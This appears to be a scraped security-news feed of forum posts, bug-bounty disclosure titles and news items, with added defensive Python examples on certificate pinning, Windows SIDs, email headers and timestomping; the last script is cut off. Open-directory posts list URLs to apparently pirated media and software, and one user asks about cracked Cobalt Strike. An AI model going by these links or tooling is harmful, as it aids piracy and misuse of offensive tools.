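    An Android Network Security Config pin is the base64 SHA-256 digest of the DER-encoded SubjectPublicKeyInfo (SPKI) of a certificate, not of the whole certificate, so a backup pin is just the same digest computed over a second public key you control but have not deployed yet (for example the key behind a CSR kept offline), listed as a second pin element in the same pin-set. The script below is an added example, not code from the post or from Android; it builds two hand-made toy RSA SPKI structures (tiny modulus, not real key pairs, used only so the example runs offline), computes the pins and prints the resulting pin-set. With real keys you would feed the PEM from `openssl x509 -in server.crt -pubkey -noout` (and the backup key's public PEM) to `pem_to_der`. The domain and expiration date are placeholders.

```python
"""Compute Android Network Security Config pins (base64 SHA-256 over the DER
SubjectPublicKeyInfo) and emit a <pin-set> with a primary and a backup pin.

Added example; the two SPKIs are constructed toy values, not real keys."""
import base64
import hashlib


def der_len(n: int) -> bytes:
    """DER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + der_len(len(body)) + body


def der_int(v: int) -> bytes:
    raw = v.to_bytes(max(1, (v.bit_length() + 7) // 8), "big")
    if raw[0] & 0x80:  # keep the INTEGER positive (minimal DER)
        raw = b"\x00" + raw
    return der_tlv(0x02, raw)


def toy_rsa_spki(modulus: int, exponent: int = 65537) -> bytes:
    """SubjectPublicKeyInfo ::= SEQUENCE { AlgorithmIdentifier, BIT STRING }
    for rsaEncryption (OID 1.2.840.113549.1.1.1) with NULL parameters."""
    rsa_public_key = der_tlv(0x30, der_int(modulus) + der_int(exponent))
    algorithm = der_tlv(0x30, bytes.fromhex("06092a864886f70d010101") + b"\x05\x00")
    return der_tlv(0x30, algorithm + der_tlv(0x03, b"\x00" + rsa_public_key))


def der_to_pem(der: bytes) -> str:
    b64 = base64.b64encode(der).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN PUBLIC KEY-----\n" + "\n".join(lines) + "\n-----END PUBLIC KEY-----\n"


def pem_to_der(pem: str) -> bytes:
    """A PEM 'PUBLIC KEY' block is the DER SPKI, base64-armoured."""
    body = "".join(l.strip() for l in pem.splitlines() if not l.startswith("-----"))
    return base64.b64decode(body)


def spki_pin(spki_der: bytes) -> str:
    """The value Android expects in <pin digest="SHA-256">."""
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode()


def pin_set_xml(domain: str, primary_pin: str, backup_pin: str, expiration: str) -> str:
    # expiration (YYYY-MM-DD) lets pinning lapse instead of bricking the app
    # if you forget to ship new pins before a key rotation.
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<network-security-config>\n"
        "  <domain-config>\n"
        f'    <domain includeSubdomains="true">{domain}</domain>\n'
        f'    <pin-set expiration="{expiration}">\n'
        f'      <pin digest="SHA-256">{primary_pin}</pin>\n'
        "      <!-- backup pin: key held offline, not yet in any certificate -->\n"
        f'      <pin digest="SHA-256">{backup_pin}</pin>\n'
        "    </pin-set>\n"
        "  </domain-config>\n"
        "</network-security-config>\n"
    )


# Constructed toy keys (NOT real RSA keys): 256-bit "moduli" are enough for DER.
PRIMARY_SPKI = toy_rsa_spki((1 << 255) | 0xC0FFEE)
BACKUP_SPKI = toy_rsa_spki((1 << 255) | 0xBADF00D)

if __name__ == "__main__":
    primary = spki_pin(pem_to_der(der_to_pem(PRIMARY_SPKI)))  # same path as a real PEM
    backup = spki_pin(BACKUP_SPKI)
    print(pin_set_xml("example.com", primary, backup, "2024-12-31"))
```

    The single pin your tool returned is normal: one certificate has one SPKI and so one pin. Generate the backup key pair now, pin its SPKI digest alongside the live one, and keep the private key offline; when you rotate to it, add the next spare. Also note the pin changes only when the key changes, so a certificate renewal that reuses the key does not break pinning.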
    Does anyone have a good vendor recommendation similar to the SQREEN RASP and in-app WAF?
    After Sqreen was acquired by Datadog we are looking for a new vendor. Any help would be great! submitted by /u/anonymous666444 [link] [comments]
    How to find an exploit POC?
    Is there any system where I can search for a CVE number and get a POC exploit? I've had some alerts about vulnerabilities in some third party dependencies but I want to demo an exploit if possible to light fire under peoples' asses so that it actually gets fixed. submitted by /u/dbxp [link] [comments]
    [Android] How is Open Mobile API (OMAPI) different from Android Keystore API+Android StrongBox?
    Hi, They both are used to store secure keys on the Secure Element (SE). I heard that the Android Keystore API is used to access the SE's basic functionality (i.e., to use it only as a container to store keys): Keystore talks to -> StrongBox, which talks to -> SE. However, to access the SE's advanced functionality one needs to use Open Mobile API (OMAPI), which talks to the SE. Is the above correct or do I misunderstand something? submitted by /u/LSDwarf [link] [comments]
    Network engineer path
    Hello, I'm posting here because I'm a bit lost and I don't know what to do with my career. I'm a network engineer currently working in the banking industry. Currently I work a lot on campus networking and especially Wi-Fi (Cisco and Aruba) and NAC stuff (mostly ISE), but I'm one of the few in the team who is able to work on almost every perimeter (LAN, Wi-Fi, automation, routing, security). Right now I don't really know what would be best for my career: I could dig more into Wi-Fi, for example, and become a specialist in one of those fields, or keep being a "jack of all trades, master of none". But I'm always afraid that by choosing to become a specialist in a field like Wi-Fi I'm closing some doors on myself and being less future-proof in my career. So I'm interested, from your experience, what do you think would be best to do? Thanks a lot submitted by /u/RedoxyLL [link] [comments]
  • Open

    Accidentally Deleted Partition While Reinstalling Windows
    I have a 3TB HDD & a 500GB SSD, the latter of which contains my OS. While attempting to reinstall Windows, I accidentally clicked Delete on a partition on this drive. I installed Windows onto my HDD instead to avoid interfering with the SSD as much as possible, but it is now inaccessible. My BIOS & Disk Manager can see it, but the only portion of it that appears in File Explorer is a 104MB "System Reserved" drive. I removed the SSD from the SATA connection & have it connected via a USB enclosure. I then ran EaseUS' file recovery on the drive (on what the software identifies as Lost Partition -1) and it appears to be finding files, but I'm not sure where to go from here. Is there a way to begin reaccessing the partition or will I need a tool to copy all the files from the SSD onto my HDD? Any help would be greatly appreciated. submitted by /u/tauraje [link] [comments]
  • Open

    Firing 8 Account Takeover Methods
    No content preview
    Kerberos: The Ticket Authentication Protocol
    No content preview
  • Open

    SecWiki News 2022-10-21 Review
    A brief analysis of Python pickle deserialization, by ourren. For more of the latest articles, visit SecWiki.
  • Open

    Link...
    What I do with sites like this is just rip the vids... Link... ​ Lots of vids mansplaining topics... ​ Come on are you guilty of mansplaining... Link... Doxing funny, why meeeeeeeeeeeee,eeeeeE. submitted by /u/xanderTgreat [link] [comments]
  • Open

    Trends in Web Threats: Old Web Skimmer Still Active Today
    We examine trends in web threats for the first quarter of 2022, including an old web skimmer that is still active five years later. The post Trends in Web Threats: Old Web Skimmer Still Active Today appeared first on Unit 42.
  • Open

    Telegram search engines…
    Telegram is a repository with a huge amount of data (perhaps already more massive than torrents). Smart people have come up with special… Continue reading on Medium »
  • Open

    [Stream] Modern Binary/Patch Diffing!
    submitted by /u/soupcreamychicken [link] [comments]
    Arm exploitation resources
    Hello, i need some resources for learning arm exploitation. I already looked into azeria labs. Does anyone have any other articles or books to suggest? submitted by /u/Greedy-Resolve-4811 [link] [comments]
  • Open

    Cloudgoat AWS CTF solution- Scenerio 6 (ec2_ssrf)
    Scenario: ec2_ssrf Continue reading on Medium »
  • Open

    Competing for Security Solution of the Year | The WitAwards 2022 China Cybersecurity Industry Awards are in full swing
    Drops make a river, grains make a tower: cast your vote for the solution you favor!
    Google launches the GUAC open-source project to strengthen software supply-chain security
    On October 20, Google announced that it is looking for interested contributors for an open-source project named GUAC, to further strengthen software supply-chain security.
    FreeBuf Weekly | Microsoft may have exposed 2.4 TB of sensitive customer data; Russia launches cyberattacks on Bulgaria
    We have rounded up this week's hot news, security incidents, good reads and handy tools, so you don't miss a single highlight of the week!
    Hackers use a new version of the FurBall Android malware to spy on Iranian citizens
    The Iranian threat actor Domestic Kitten is running a new malicious campaign.
  • Open

    How to get experience with cobalt strike
    How are you realistically supposed to use cobalt strike in training scenarios and get familiar with it? Buy a personal license? Does work have to help you out there or just practice on the job? Also, how illegal is it to own the cracked version for home lab use? submitted by /u/knock_on_wood_yall [link] [comments]

  • Open

    SHA-3 Buffer Overflow - CVE-2022-37454
    submitted by /u/Gallus [link] [comments]
    Log4J-scan update: Detection for Apache Commons Text RCE (CVE-2022-42889)
    submitted by /u/mazen160 [link] [comments]
    Open Source drop - Evil OIDC Server for SSRF testing from Doyensec. Helpful for testers and bug bounty.
    submitted by /u/ds_at [link] [comments]
    Reverse Engineering the Apple MultiPeer Connectivity Framework
    submitted by /u/juken [link] [comments]
    Expanding (even further) on UUIDv1 Security Issues
    submitted by /u/csanders_ [link] [comments]
    Untangling Azure Active Directory Principals & Access Permissions
    submitted by /u/0xcsandker [link] [comments]
    Fantastic Rootkits: And Where to Find Them (Part 1)
    submitted by /u/jat0369 [link] [comments]
  • Open

    POOL_UPGRADE request handler may allow an unauthenticated attacker to remotely execute code on every node in the network.
    Hyperledger disclosed a bug submitted by shakedreiner: https://hackerone.com/reports/1705717 - Bounty: $2000
    Removed user can still view comments on the file/documents.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1335070 - Bounty: $750
    Ability to View Non-Permitted Admin Log
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1533220 - Bounty: $500
    [CSRF] No Csrf protection against sending invitation to join the team.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/728199 - Bounty: $1000
  • Open

    A Fringe Digital Reborn
    I started Fringe Digital in 2021 as a transitionary entrepreneurial project to pick-up where I was leaving off from a career in technology… Continue reading on Medium »
    Pakistan CNIC Information
    Note: this is all public data and for educational purposes only. i haven't used any illegal way to out source any data given in this blog… Continue reading on Medium »
  • Open

    Open FTP, accidental and irresponsibly open
    I was inspired by https://www.reddit.com/r/opendirectories/comments/y8d6jv/why_are_open_directories_dying/ This is a story of ODs and how I only entered them once. And a fluke, once-in-a-lifetime OD find. A few years ago I was a white-hat teacher of cyber security. I'd use NapalmFtp as my primary fishing pole to find ODs. Back then many people most definitely would not want their home FTP server exposed. They were open by default. I ran scans to see who made the hardware... but I forget. I would hit a server once and never connect to it again. Tax returns were common. South American companies left their systems open most often. One day I just entered the Spanish word for flower into Napalm. Basically I just wanted a random seed, not a search for 2009 Taxes.pdf etc. I did find an OD ftp…
    Link...
    So open directories running out... Link... Not been through all, but took what I wanted, Which brings the question, Do you keep all the data off directories ?... Or is that just me... Nice stack of drives on a shelf... submitted by /u/xanderTgreat [link] [comments]
    fauux neocities index
    http://cs.gettysburg.edu/~duncjo01/archive/patterns/lain/ submitted by /u/Better_Base8805 [link] [comments]
  • Open

    New Vault Alert: Welcome PhononDAO
    We are excited to welcome PhononDAO to the Hats ecosystem! This unique partnership will take part in two steps; starting with a short term… Continue reading on Medium »
    Finding P1 Vulnerabilities: Tools & Resources
    The second, more in-depth part of ‘Finding P1 Vulnerabilities: A Step by Step Guide’. Continue reading on The Gray Area »
    Google VRP — [Insecure Direct Object Reference] $3133.70
    Hi All!!!, Yes… it’s me. As usual I want to give a story about how I find IDOR [Insecure Direct Object Reference] vulnerability on one of… Continue reading on Medium »
    HTTP request smuggling Explained and Exploited Part 0x2
    Hi! My name is Hashar Mujahid, and today we will continue to discuss what HTTP request smuggling vulnerabilities are and how we can… Continue reading on InfoSec Write-ups »
    Detecting Log4j & its Remediation
    This article is dedicated to log4j and how it’s being exploited in the wild by attackers. Continue reading on Medium »
    Smaller dalfox guide
    There is nothing special in it, just a simple and short guide on how to use dalfox professionally. Continue reading on Medium »
    Don't use Dalfox for Automated XSS
    If you are reading this, you are using dalfox or wanted to, for finding XSS automatically. Continue reading on Medium »
  • Open

    SecWiki News 2022-10-20 Review
    The hidden danger in the Response: revealing the weak points that exist in responses, by 蓝色淡风
    An introduction to MiraclePtr, a UAF exploit mitigation technique, by 路人甲
    A brief discussion of hardcoded passwords and tools that scan for them, by 路人甲
    Using CodeQL to analyze the fastjson 1.2.80 exploit chain, by 路人甲
    woodpecker-framwork-release: a framework for precise detection and deep exploitation of high-risk vulnerabilities, by 路人甲
    A research journey into fuzzing, by ourren
    2022 data security market report, by ourren
    How to bypass JA3 fingerprint checks? by ourren
    For more of the latest articles, visit SecWiki.
  • Open

    The Curious Case of the Password Database
    Nowadays, password managers are king. We use password managers to secure our most sensitive credentials to a myriad of services and sites; a compromise of the password manager could prove devastating. Due to recently disclosed critical Common Vulnerabilities and Exposures (CVEs) involving ManageEngine’s Password Manager Pro software, a client came to us at TrustedSec, wondering:... The post The Curious Case of the Password Database appeared first on TrustedSec.
  • Open

    TEXT4Shell PoC (CVE-2022–42889)
    No content preview
    Pylirt — Python Linux Incident Response Toolkit
    No content preview
    JSON Web Tokens
    No content preview
    HTTP request smuggling Explained and Exploited Part 0x2
    No content preview
  • Open

    First Pentest — help?
    Hi, so. I might be able to pentest a website (small company) if I get the OK from their higher-ups. At the risk of sounding stupid (sorry), am I missing anything? I don't want to get into legal trouble, since this isn't labs, so I'm a bit nervous and want to double check. Rules of engagement, including details about scope, time, etc. Pentest authorization document, including explicit written consent from 3rd parties like the domain host. Contract...? I don't know how I'd make this work since this is completely remote... I don't sign contracts over the internet often so I've no idea. Maybe DocuSign? NDA I think. submitted by /u/ferachrine [link] [comments]
    Noob trying to understand RID's in broad terms
    Security Identifiers are issued by a security identifier authority. This might be the local system account, or might be a domain controller. Two SIDs are issued to identify an account on a domain-joined computer: a local SID, and one in Active Directory. In order to ensure the SID for every object in the relevant scope/domain is unique (I use the term scope to indicate the local computer system, rather than Active Directory), a Relative Identifier is issued. So my question is, why not just use a RID in whichever scope? (Or why not ensure SIDs are not duplicated within whichever scope?) Is the everything-but-the-RID portion of SIDs shared between scopes or something? (I have searched this on several occasions and the technicality of the results quickly inhibits understanding the subject in the broad terms I need.) Thanks in advance for any help! submitted by /u/WhichKey1 [link] [comments]
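    A SID is the issuer's identifier (revision, identifier authority and all sub-authorities except the last) with the RID appended as the final sub-authority, so the same RID under two issuers yields two different SIDs; that is why a bare RID cannot be used on its own. The script below is an added example, not from the post: it parses SID strings, separates the issuer prefix from the RID, converts to and from the binary layout (1-byte revision, 1-byte sub-authority count, 6-byte big-endian identifier authority, 4-byte little-endian sub-authorities) and labels well-known RIDs. The two S-1-5-21 prefixes are made-up values standing in for a domain SID and a local machine SID.

```python
"""Parse, classify and pack Windows SIDs. Added example; the S-1-5-21
prefixes used in the demo are made up."""
import struct

# Documented well-known RIDs (same RID under every S-1-5-21 issuer).
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 512: "Domain Admins", 513: "Domain Users"}


def parse_sid(sid: str):
    """'S-1-5-21-a-b-c-1001' -> (revision, identifier_authority, [sub_authorities])."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"not a SID string: {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:  # SID_MAX_SUB_AUTHORITIES
        raise ValueError("too many sub-authorities")
    return revision, authority, subs


def split_rid(sid: str):
    """Everything but the last sub-authority identifies the issuer (domain or
    local machine); the last sub-authority is the RID."""
    rev, auth, subs = parse_sid(sid)
    if not subs:
        raise ValueError("SID has no RID")
    prefix = "-".join(["S", str(rev), str(auth), *map(str, subs[:-1])])
    return prefix, subs[-1]


def sid_to_bytes(sid: str) -> bytes:
    """Binary SID: Revision, SubAuthorityCount, IdentifierAuthority[6] (big-endian),
    SubAuthority[count] (little-endian DWORDs)."""
    rev, auth, subs = parse_sid(sid)
    head = struct.pack("<BB", rev, len(subs)) + auth.to_bytes(6, "big")
    return head + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(data: bytes) -> str:
    rev, count = data[0], data[1]
    auth = int.from_bytes(data[2:8], "big")
    subs = struct.unpack("<%dI" % count, data[8:8 + 4 * count])
    return "-".join(["S", str(rev), str(auth), *map(str, subs)])


def describe(sid: str) -> dict:
    rev, auth, subs = parse_sid(sid)
    prefix, rid = split_rid(sid)
    if auth == 5 and subs[0] == 21:
        scope = "domain or local machine (S-1-5-21 issuer)"
    elif auth == 5 and subs[0] == 32:
        scope = "BUILTIN (per-machine aliases)"
    else:
        scope = "well-known / other authority"
    return {"issuer": prefix, "rid": rid, "scope": scope, "well_known_rid": WELL_KNOWN_RIDS.get(rid)}


if __name__ == "__main__":
    # Made-up issuers: one domain, one workstation. Same RID, different SIDs.
    domain = "S-1-5-21-1111111111-2222222222-3333333333"
    machine = "S-1-5-21-1234567890-987654321-1122334455"
    for sid in (f"{domain}-500", f"{machine}-500", "S-1-5-32-544", "S-1-5-18"):
        print(sid, describe(sid), sid_to_bytes(sid).hex())
```

    Running the demo shows why the prefix matters: `S-1-5-21-…-500` is the domain Administrator under the domain issuer and the local Administrator under the machine issuer, and the two binary forms differ even though the RID is identical.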
  • Open

    Who will be the Security Technology Transformation of the Year? | The WitAwards 2022 China Cybersecurity Industry Awards are underway
    Come see whether the company you support made the list.
    Java Security Basics (4): Java's reflection mechanism
    Today's update is an article on the Java reflection mechanism. I am new to Java security, so if anything in it is inaccurate, I ask the experts to correct me.
    How to view the contradiction in China's cybersecurity talent gap | FreeBuf enterprise-side group topic discussion
    On one side, loud calls about a shortage of talent; on the other, hurried "optimization" layoffs. Why does this seemingly contradictory situation arise?
    A comparative performance analysis of Android reverse-engineering tools
    This article benchmarks well-known domestic and foreign Android reverse-engineering tools against each other.
    7 steps to protect the healthcare industry from cyber threats!
    This article lays out some security safeguards, in the hope of helping the healthcare industry build up its cybersecurity.
    FreeBuf Morning Report | New UEFI rootkit malware BlackLotus exposed; Lapsus$ gang member arrested
    In the first half of 2022, total vendor revenue in China's IT security services market was about US$1.225 billion.
    Due to a misconfiguration, Microsoft may have leaked a large amount of sensitive customer data
    The misconfiguration could have allowed unauthenticated access, exposing certain business documents and transaction data between Microsoft and customers, as well as customers' personal information.
    Clearing the fog of the Russia-Ukraine cyber war: the cyberspace mapping chapter
    In conventional war, maps play an important role in victory, and that is even more true in cyber war; to obtain an accurate network map, cyberspace mapping is a necessary means.
  • Open

    RedLine Stealer malware spreads via phishing pages
    Author: CybleBlogs. Translator: Knownsec 404 Lab translation team. Original link: https://blog.cyble.com/2022/10/14/online-file-converter-phishing-page-spreads-redline-stealer/ Windows shortcut files used to deliver the payload. Today, many people use online digital tools simply because they are easy to use and offer users a...
  • Open

    CVE-2022-1786 A Journey To The Dawn
    Article URL: https://blog.kylebot.net/2022/10/16/CVE-2022-1786/ Comments URL: https://news.ycombinator.com/item?id=33271476 Points: 1 # Comments: 0
  • Open

    Report Notes
    Mainly for those who perform IR, but I welcome anyone to respond: what are you using for notes across a team? OneNote? Notion? Ghostwriter? Something else? submitted by /u/purpleteamer24 [link] [comments]

  • Open

    A framework for OAuth 2.0 device code authentication grant flow phishing
    submitted by /u/Acceptable-Doubt-878 [link] [comments]
    Telerik Revist - New Exploit Tool
    submitted by /u/aconite33 [link] [comments]
    HTTP/3 connection contamination: an upcoming threat
    submitted by /u/albinowax [link] [comments]
    Wireless Penetration Testing complete Repo
    submitted by /u/lutzenfried [link] [comments]
    Detecting and mitigating CVE-2022-42889 a.k.a. Text4shell
    submitted by /u/MiguelHzBz [link] [comments]
    Hara-Kirin: Dissecting the Privileged Components of Huawei Mobile Devices (Hexacon 2022)
    submitted by /u/M0t0k0Kus4n4g1 [link] [comments]
    Microsoft Office Online Server Remote Code Execution
    submitted by /u/gid0rah [link] [comments]
    The Danger of Falling to System Role in AWS SDK Client
    submitted by /u/nibblesec [link] [comments]
    CVE-2022-42889: Apache Commons Text prior to 1.10.0 allows RCE (CVSS9.8), aka "Text4Shell"
    submitted by /u/qwerty0x41 [link] [comments]
    Azure function to insert MISP data into Azure Sentinel
    submitted by /u/wez32 [link] [comments]
    A New Attack Surface on MS Exchange Part 4 - ProxyRelay
    submitted by /u/CyberMasterV [link] [comments]
    PHP filters chain: What is it and how to use it - convert almost any file inclusion to RCE
    submitted by /u/Gallus [link] [comments]
  • Open

    Why are open directories dying?
    Came late to the scene in 2016. There are a lot less ODs for TV than used to be. Why is that? DMCAs? submitted by /u/phollda [link] [comments]
    5 links...
    1 mix of images/clips, not engrish... Also, is it a real open directory? https://kaatis.party/?C=S;O=D
    2 Just some gifs, vrbangers... http://www.bokepvr.com/wp-content/uploads/2015/08/?C=S;O=D
    3 mp3's, mp4's, images https://mrbloaded.com/wp-content/uploads/
    4 just images/gif, check out NEWS WTFF.gif, 5th of november... http://www.crucialbrutal.com/site_images/?S=D
    5 Some BDSM stuff... http://obeynikita.com/wp-content/uploads/2018/01/
    Looking for the link to check what has been posted, to check this link... http://162.12.215.254/Data/
    submitted by /u/xanderTgreat [link] [comments]
    Movies, TV Shows, Music, OS ISOs
    http://78.40.121.68:8080/ - Movies & TV Shows
    http://149.56.24.230:9002/ - TV Show (Bojack Horseman S01-S06)
    http://104.168.151.193/ - Posture/Neck videos, GBA BIOS, Yo-Kai Watch for 3DS
    http://139.196.159.145/ - Windows/Mac Software, Android APKs, IEEE docs
    http://nellyfan.org/indigo/ - Nelly Furtado Music, Software, Magazine scans
    http://djazmatic.com/Acapellas3/ - Music (vocals only); /Instrumentals3/ - Music (instrumentals only); /Mixtapes3/ - Music (mashups/mixes)
    http://www.themamaship.com/fp1/ - Music
    http://m3bd.net/m3bd/ - Music & "Design"
    http://dl.mytehranmusic.com/ghadimi/ - Music & Music Videos
    http://aircredits.net/thi/singles/ - Music (mashups)
    https://windy.fansub.ovh/decide/ - TV Shows, Movies, Software, Audio (JP/EN)
    http://148.251.123.40/ - OS ISOs, Software
    https://www.jacobsm.com/geedryve/ - Old TV, music, propaganda/memes
    http://78.203.154.250/ - Movies/TV Shows (FR)
    http://syn.org.au/app/uploads/ - Podcasts, Weird AU promo videos, TONS of images (warning: page may freeze if you try to visit via browser)
    http://video-cdn.simpletv.eu/video/ - Movies (RU/EN)
    http://www.flixtres.com/maria/ - Movies (SP)
    http://74.208.251.230/Contenido/ - Movies/TV Shows (SP)
    https://lipstickandmetal.com/ - Record scans/pictures
    submitted by /u/JasonSec [link] [comments]
  • Open

    Found vulnerability on subdomain of nasa.gov simply using censys
    Hi, I have found a low-level vulnerability on a subdomain of nasa.gov simply using Censys. At first I used the process mentioned in my… Continue reading on Medium »
    Live subdomain enumeration using censys
    I have found a way to find live subdomains(it is not guaranteed to work on all the websites) using simple keywords in censys. Continue reading on Medium »
    23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite
    How I found Authentication Bypass >> File Upload vulnerability >> Arbitrary File Overwrite, and how I managed to find the path of the file… Continue reading on Medium »
    Scan QR Code and Got Hacked (CVE-2021–43530 : UXSS on Firefox Android Version)
    I. QR Code Continue reading on Medium »
    Firing 8 Account Takeover Methods
    Hello! this is Md Maruf Hosan a bug bounty hunter from Bangladesh. I am gonna be firing some account takeover methods Continue reading on Medium »
  • Open

    Mass Accounts Takeover Without any user Interaction at https://app.taxjar.com/
    Stripe disclosed a bug submitted by mr_asg: https://hackerone.com/reports/1685970 - Bounty: $13000
    Local applications from user's computer can listen for webhooks via insecure gRPC server from stripe-cli
    Stripe disclosed a bug submitted by gregxsunday: https://hackerone.com/reports/1369191 - Bounty: $500
    User information disclosed via API
    U.S. General Services Administration disclosed a bug submitted by toormund: https://hackerone.com/reports/1218461
    Bypassing domain deny_list rule in Smokescreen via double brackets [[]] which leads to SSRF
    Stripe disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1580495 - Bounty: $500
    Tomcat Servlet Examples accessible at https://44.240.33.83:38443 and https://52.36.56.155:38443
    Stripe disclosed a bug submitted by mustafa_farrag: https://hackerone.com/reports/1560149 - Bounty: $1500
    Fully TaxJar account control and ability to disclose and modify business account settings Due to Broken Access Control in /current_user_data
    Stripe disclosed a bug submitted by mr_asg: https://hackerone.com/reports/1677541 - Bounty: $1000
    IDOR able to buy a plan with lesser fee
    Automattic disclosed a bug submitted by ug0x01: https://hackerone.com/reports/1679276
    DOM XSS at `https://adobedocs.github.io/OAE_PartnerAPI/?configUrl={site}` due to outdated Swagger UI
    Adobe disclosed a bug submitted by dreamer_eh: https://hackerone.com/reports/1736378
  • Open

    which email would the reply be sent to?
    Hi everyone, please let me know if more detail is needed or if this does not belong here. I am currently working the M57 Jean case as an exercise for a digital forensics class. I found this email but I'm unsure whether the reply would be sent to the return path or to the email that is being spoofed (tuckgeorge@gmail.com). Sorry if this is a noob question; any advice would be appreciated. submitted by /u/Namibguy [link] [comments]
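    The headers involved answer different questions: a mail client builds a reply from the Reply-To header when one is present and from the From header otherwise (RFC 5322 section 3.6.2), while Return-Path is the SMTP envelope sender recorded at final delivery (RFC 5321 section 4.4) and is where bounces go, not replies. The script below is an added example, not part of the post or the case material: it parses two constructed messages with example.com/example.net addresses, reports where a reply and a bounce would go, and flags the From/Return-Path/Reply-To domain mismatches that are the usual tell of a spoofed sender.

```python
"""Where a reply goes versus where a bounce goes, and header-domain
mismatches worth noting in a report. Added example; both messages are
constructed samples."""
import email
from email.utils import getaddresses, parseaddr

# Constructed: display name and From say one domain, Reply-To and the
# envelope sender say another.
SPOOFED = """\
Return-Path: <bounce-1234@lists.mailer.example.net>
Received: from mailer.example.net by mx.example.com; Tue, 11 Oct 2022 10:00:00 +0000
From: George Tuck <g.tuck@example.com>
Reply-To: George Tuck <george.tuck.mail@example.net>
To: jean@example.com
Subject: re: the document
Message-ID: <abc123@mailer.example.net>

Please send the spreadsheet.
"""

# Constructed: no Reply-To, envelope sender matches From.
PLAIN = """\
Return-Path: <g.tuck@example.com>
From: George Tuck <g.tuck@example.com>
To: jean@example.com
Subject: lunch

Noon?
"""


def reply_targets(raw: str) -> list:
    """Addresses a mail client would put in To: when the user hits Reply."""
    msg = email.message_from_string(raw)
    headers = msg.get_all("Reply-To") or msg.get_all("From") or []
    return [addr for _, addr in getaddresses(headers)]


def bounce_target(raw: str):
    """Envelope sender (MAIL FROM) as recorded by the delivering MTA."""
    msg = email.message_from_string(raw)
    return parseaddr(msg.get("Return-Path", ""))[1] or None


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower()


def header_mismatches(raw: str) -> list:
    """Cross-domain disagreements between From, Return-Path and Reply-To."""
    msg = email.message_from_string(raw)
    sender = parseaddr(msg.get("From", ""))[1]
    findings = []
    bounce = bounce_target(raw)
    if bounce and domain_of(bounce) != domain_of(sender):
        findings.append(f"Return-Path domain {domain_of(bounce)} differs from From domain {domain_of(sender)}")
    for addr in reply_targets(raw):
        if domain_of(addr) != domain_of(sender):
            findings.append(f"Reply-To {addr} is outside From domain {domain_of(sender)}")
    return findings


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("plain", PLAIN)):
        print(label, "reply ->", reply_targets(raw), "| bounce ->", bounce_target(raw))
        for f in header_mismatches(raw):
            print("   ", f)
```

    Treat the mismatch findings as leads, not verdicts: mailing lists and bulk senders legitimately rewrite Return-Path, so the evidentiary value comes from pairing them with the Received chain and any authentication results headers.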
    A Detailed Analysis of the Gafgyt Malware Targeting IoT Devices [PDF]
    submitted by /u/CyberMasterV [link] [comments]
    USB forensics and timestomping
    I'm looking at this drive where a large number of files have the same 'last accessed' timestamp, or it's within seconds of each other. I get that logging into or restarting a system can do that to an extent, but this seems to be more than that. MFT Explorer and Axiom Cyber have picked up some timestomping. What's the benefit of changing the last accessed stamp? Overall, I'm supposed to be looking for indicators that files were copied to an external drive. I've been checking shellbags, lnk files, browser activity. What are other artifacts to look at in USB copying cases? Any resources I could read up on? submitted by /u/Inevitable_Logging [link] [comments]
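    Two checks an examiner typically runs on the MFT timestamps behind these questions: compare $STANDARD_INFORMATION against $FILE_NAME (user-mode SetFileTime only rewrites $SI, the kernel keeps $FN, so an $SI creation time older than the $FN one, or $SI values with an exactly-zero sub-second part next to a precise $FN value, point at manual tampering), and group files whose last-access times sit within a few seconds of each other, which usually marks one bulk operation such as a copy, an archive extraction or an AV sweep rather than a user opening files (on most Windows builds NTFS does not update last-access on read by default anyway). The script below is an added example, not from the post or from either tool named in it; the records are constructed samples shaped like an MFT parser export, with FILETIME integers (100 ns ticks since 1601-01-01) for the $SI and $FN fields.

```python
"""Timestomping heuristics over NTFS $MFT timestamps and clustering of
last-access times. Added example; all records are constructed."""
from datetime import datetime, timezone

FT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SEC = 10_000_000  # FILETIME resolution is 100 ns


def to_filetime(ts: str) -> int:
    """'YYYY-MM-DD HH:MM:SS[.ffffff]' (UTC) -> FILETIME ticks."""
    dt = datetime.fromisoformat(ts).replace(tzinfo=timezone.utc)
    delta = dt - FT_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SEC + delta.microseconds * 10


def rec(name, si_created, si_modified, si_accessed, fn_created):
    return {"name": name, "si_created": to_filetime(si_created),
            "si_modified": to_filetime(si_modified), "si_accessed": to_filetime(si_accessed),
            "fn_created": to_filetime(fn_created)}


def timestomp_indicators(r: dict) -> list:
    reasons = []
    # SetFileTime() rewrites only $STANDARD_INFORMATION; $FILE_NAME is kernel-
    # maintained, so an $SI creation older than $FN creation was set by hand.
    if r["si_created"] < r["fn_created"]:
        reasons.append("si_created_before_fn_created")
    # Stomping tools that take whole seconds leave the 100 ns part at zero,
    # while the kernel-written $FN value keeps sub-second precision.
    for key in ("si_created", "si_modified"):
        if r[key] % TICKS_PER_SEC == 0 and r["fn_created"] % TICKS_PER_SEC != 0:
            reasons.append(f"{key}_has_zero_subseconds")
    return reasons


def access_clusters(records: list, window_secs: int = 5) -> list:
    """Names of files whose last-access times chain within window_secs of the
    previous one (time order); singletons are dropped."""
    if not records:
        return []
    ordered = sorted(records, key=lambda r: r["si_accessed"])
    clusters, current = [], [ordered[0]]
    for r in ordered[1:]:
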